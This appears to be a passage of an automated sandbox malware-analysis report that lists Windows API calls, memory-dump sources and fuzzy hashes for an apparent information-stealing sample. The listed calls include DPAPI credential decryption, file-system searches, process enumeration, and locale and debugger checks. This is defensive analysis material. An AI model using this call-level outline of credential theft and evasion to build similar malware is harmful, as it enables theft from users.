                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                  • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: d1609602d4751f33da9c37f1768f1aa4302fa71f7c98392afc343a762dea85b7
                                  • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                  • Opcode Fuzzy Hash: d1609602d4751f33da9c37f1768f1aa4302fa71f7c98392afc343a762dea85b7
                                  • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                  APIs
                                  • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,007478F8,?,0042110C,?,00000000,?), ref: 0041696C
                                  • sscanf.NTDLL ref: 00416999
                                  • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,007478F8,?,0042110C), ref: 004169B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,007478F8,?,0042110C), ref: 004169C0
                                  • ExitProcess.KERNEL32 ref: 004169DA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID: B$u
                                  • API String ID: 2533653975-1063657715
                                  • Opcode ID: c1fc947e1a79b38c7d487adaf1063ec9a4b0ee7c41a6411bb6b711e983b9177c
                                  • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                  • Opcode Fuzzy Hash: c1fc947e1a79b38c7d487adaf1063ec9a4b0ee7c41a6411bb6b711e983b9177c
                                  • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022AF985
                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 022AF9D6
                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 022AF9EC
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022AFD18
                                  • FindClose.KERNEL32(000000FF), ref: 022AFD2A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                  • Instruction ID: 38eef91028d9401d68e5c8a886b8e0403566bea1a3211fd0f864f54522c59e0f
                                  • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                  • Instruction Fuzzy Hash: 19B181719203089BCB25FFE4DDA1EEE737AAF55340F0081A9E40A96558EF356B48CF91
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                  • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                  • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*$@
                                  • API String ID: 433455689-2355794846
                                  • Opcode ID: f970a8509302eaf02035adbc7551205bfd23abb47e36f1cf4a831beee27c0276
                                  • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                  • Opcode Fuzzy Hash: f970a8509302eaf02035adbc7551205bfd23abb47e36f1cf4a831beee27c0276
                                  • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 022A1B8A
                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 022A1BDA
                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 022A1BF0
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022A1FA7
                                  • DeleteFileA.KERNEL32(00000000), ref: 022A2031
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022A2087
                                  • FindClose.KERNEL32(000000FF), ref: 022A2099
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 1415058207-0
                                  • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                  • Instruction ID: 80e2f19ba033b14d0eb68a7f733368bce968bf9d415380ebbb0bcecf44431310
                                  • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                  • Instruction Fuzzy Hash: 9712FF719203189BCB2AFBE4CD95EED737AAF65340F40419DA10A62198EF746F88CF50
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 022AE0C5
                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 022AE115
                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 022AE12B
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022AE647
                                  • FindClose.KERNEL32(000000FF), ref: 022AE659
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2325840235-0
                                  • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                  • Instruction ID: 942f73b729bd83272e5b7ef0bf7ba6938431d54ba8052632c1e5c107f774da08
                                  • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                  • Instruction Fuzzy Hash: F9F1C0715203189BCB2AFBA4DD95EEE733ABF25340F4041DAA15A62158EF346F89CF50
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                  • LocalFree.KERNEL32(00000000), ref: 00417D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: e5c57c6c764d32f02f1601ebf7bf93b63245a0d7122093c1d099e751a5e50907
                                  • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                  • Opcode Fuzzy Hash: e5c57c6c764d32f02f1601ebf7bf93b63245a0d7122093c1d099e751a5e50907
                                  • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                  APIs
                                  • memset.MSVCRT ref: 022ACABA
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022ACAD8
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022ACAE3
                                  • memcpy.MSVCRT(?,?,?), ref: 022ACB79
                                  • lstrcat.KERNEL32(?,00420B46), ref: 022ACBAA
                                  • lstrcat.KERNEL32(?,00420B47), ref: 022ACBBE
                                  • lstrcat.KERNEL32(?,00420B4E), ref: 022ACBDF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                  • String ID:
                                  • API String ID: 1498829745-0
                                  • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                  • Instruction ID: 6123371a06c22180a0808d5ef848ee50ce141ec528d5dea75c176415c61602cb
                                  • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                  • Instruction Fuzzy Hash: B441A07891421AEFDB10DFD0DC88BEEBBB9BB48304F0045A9E609A6280D7755B84CF91
                                  APIs
                                  • memset.MSVCRT ref: 0040C853
                                  • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,007500B8), ref: 0040C871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                  • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                  • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                  • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                  • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                  • String ID:
                                  • API String ID: 1498829745-0
                                  • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                  • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                  • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                  • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: N@
                                  • API String ID: 4291131564-4229412743
                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                  • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                  • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 022B7E48
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 022B7E60
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 022B7E74
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 022B7EC9
                                  • LocalFree.KERNEL32(00000000), ref: 022B7F89
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID:
                                  • API String ID: 3090951853-0
                                  • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                  • Instruction ID: dc3117c1b00049a518d8d80bbcc5b52700ae4c9e16d664208aa9c079b4e4a590
                                  • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                  • Instruction Fuzzy Hash: 7F414C72960218ABCB25DF94DC89BEDB3B5FF54740F2041D9E109A6294DB742F85CFA0
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 022BBE09
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 022BBE1E
                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 022BBE29
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 022BBE45
                                  • TerminateProcess.KERNEL32(00000000), ref: 022BBE4C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID:
                                  • API String ID: 2579439406-0
                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                  • Instruction ID: 7155f0865a1ffa6bdebfc2fa48d6c668e4a0e657b5138fa126ed5f19dca6278a
                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                  • Instruction Fuzzy Hash: 0021C0BC9103059FDB15DF69F8886963BE4FB0A344F50403AE90A872A4EBB05981EF49
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                  • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID:
                                  • API String ID: 2579439406-0
                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                  • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                  • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 022A74B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022A74BB
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 022A74E8
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 022A750B
                                  • LocalFree.KERNEL32(?), ref: 022A7515
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                  • Instruction ID: d1cec189e1f6c7341e2a4584e4723bb95380960f4ce4f4daae6e877c620fddbf
                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                  • Instruction Fuzzy Hash: 890100B5A90208BBEB10DFD4DD45F9DB7B9EB44704F104155FB05AA2C4D6B0AA00CB69
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 3657800372-0
                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                  • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                  • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022B9885
                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 022B9899
                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 022B98AE
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 022B98C3
                                  • CloseHandle.KERNEL32(00420ACA), ref: 022B98E1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
